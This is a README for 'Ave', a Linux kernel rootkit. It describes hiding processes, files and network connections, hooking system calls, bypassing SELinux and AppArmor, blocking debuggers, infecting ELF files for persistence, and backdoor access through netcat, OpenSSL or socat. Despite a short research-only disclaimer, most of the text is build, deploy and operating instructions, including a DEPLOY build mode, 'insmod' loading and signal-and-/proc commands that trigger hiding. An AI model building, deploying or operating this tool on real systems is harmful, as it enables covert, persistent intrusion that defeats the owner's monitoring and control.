Ave is a loadable Linux kernel module 5.18+ capable of hiding processes, files, and connected sockets at the kernel level, plus substituting system calls and encrypting traffic. It runs on x86-64 and ARM64. In short, it’s a universal tool for stealthily concealing any objects in the system, with extra features for bypassing SELinux/AppArmor, anti-debugging, and a whole set of other functions.
Key capabilities:
- Kernel level cloaking — removes traces from lsmod, /proc, /sys, ps, top.
- File & directory hiding — filldir/filldir64 hooks suppress listings.
- Dynamic syscall substitution — live patching of read, kill, clone.
- Encrypted networking — Netfilter based AES tunnel with signature obfuscation.
- Anti debug & hardening bypass — blocks ptrace/strace, skirts RELRO/PIE/NX.
- Persistence — ELF patching & init-system hooks for auto start.
Educational & Research Purposes Only This code is provided as is with the explicit intention that it be studied in controlled, legal environments—such as security research labs, malware-analysis sandboxes, or coursework on kernel internals.
You are solely responsible for any use or misuse.
Deploying Ave on systems without the explicit permission of their owners may violate local, national, and international laws. The authors and maintainers accept no liability for damages, data loss, or legal consequences arising from the use of this software.Always obtain informed, written consent before testing on any device you do not own, and comply with all relevant regulations and organizational policies.
To build Ave, first install the packages:
sudo apt install cmake gcc g++ llvm-dev llvm-tools python3-pip qemu-system-x86 socat netcat libssl-dev
pip3 install lit
sudo ln -s ~/.local/bin/lit /usr/bin/llvm-lit-
Prepare a folder for builds:
mkdir build && cd build cmake ../ -DCMAKE_C_COMPILER=gcc -DPROCNAME="interface"
-
Start the build:
make
If you need to build for another kernel or another machine:
cmake ../ -DKERNEL_DIR=/path/to/kernel/headers -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc
makeAve removes itself from lsmod, sys, and other places where the module is normally visible. In DEPLOY mode all this works out of the box.
Uses the filldir and filldir64 hooks:
- Everything thats hidden vanishes from ls, ps, top.
- No traces in standard utilities.
Mix of Ftrace hooks and direct editing of the system-call table:
- Dynamically updates hooks as the kernel changes.
- Replaces, for example, read, kill, clone.
Through netfilter Ave controls connections and generates hidden signatures. Everything is encrypted with AES.
SELinux, AppArmor, and the relro, pie, nx protections are bypassed, adapting to the specific system configuration.
- Filters and blocks ptrace, strace, and other debuggers.
- Data in memory is encrypted to resist dumping and analysis.
- On debugging attempts the module starts substituting information.
- Patches ELF files for autoload.
- Fixes itself in system init mechanisms so it starts at boot.
Choose from:
- Netcat: uses port knocking for remote hidden access.
- OpenSSL: to immediately have an encrypted channel.
- Socat: universal, for any socket type.
- Removes traces from dmesg.
- Masks TCP/UDP connections.
- Hides itself from /proc.
kill -SIGCONT 31337After that /proc/interface_name starts listening for your commands.
kill -SIGCONT 666
su echo <PID> > /proc/interface_name-
In the current directory:
echo hide-file=README.txt > /proc/interface_name
-
By absolute path:
echo hide-directory=/home/user/docs > /proc/interface_name
To check which backdoors are available:
utils/bd_connect.sh- x86-64 and ARM64 are the main focus.
- Kernels: 5.18+.
- Automatically adapts to kernel settings so hooks don’t break after updates.
- Completely removes hidden processes and connections from monitoring.
- The module blocks unloading and, if tampered with, tries to back itself up.
- Scripts for quick build and deployment of the rootkit.
- Key generation for encrypted channels.
- Modular infection machinery for ELF files autoconnect.
Tested on:
- Debian 12.8: kernel 6.1.0-10-amd64 LTS.
- Ubuntu 22.04.3 LTS: kernel 5.19.0-32-generic HWE.
- Ubuntu 23.10: kernel 6.5.0-25-generic.
-
Local tests:
make check-ave -j1
-
Cross-tests:
cmake ../ -DKERNEL_DIR=/path/to/kernel/headers -DCROSS_TESTS=ON make check-ave
The Makefile relies on the kernel Kbuild system at /lib/modules/$(uname -r)/build.
Building produces ave.ko, a kernel module you can load with:
sudo insmod ave.koand verify with:
lsmod | grep ave| Target | Description |
|---|---|
| all | Builds ave.ko. Requires PROCNAME= to set the /proc/ entry. |
| injection | Builds the injection binary from injection.S for the protection logic. |
| strip | Strips debug symbols from ave.ko. |
| reset-auto | Clears generated keys in the sources. |
| clean | Removes object files and resets keys, returning the project to a clean state. |
| lgtm | Runs injection first, then builds the module. |
- With DEPLOY=1, the build is made without debugging.
- EST_ENV uses fixed test keys.
- BDKEY and UNHIDEKEY are randomly generated by default.
-
Install packages:
sudo apt update sudo apt install build-essential linux-headers-$(uname -r) \ ctags uuid-runtime -
Go to the source directory:
cd /home/user/ave -
Build with a PROCNAME:
make PROCNAME=hidden DEPLOY=1 make PROCNAME=hidden
-
Check that ave.ko exists:
ls -l ave.ko
-
Load the module:
sudo insmod ave.ko lsmod | grep ave -
Build injection:
make injection
-
Additional targets:
- make strip — remove debug symbols from ave.ko.
- make lgtm — run injection, then build.
-
Clean up:
make clean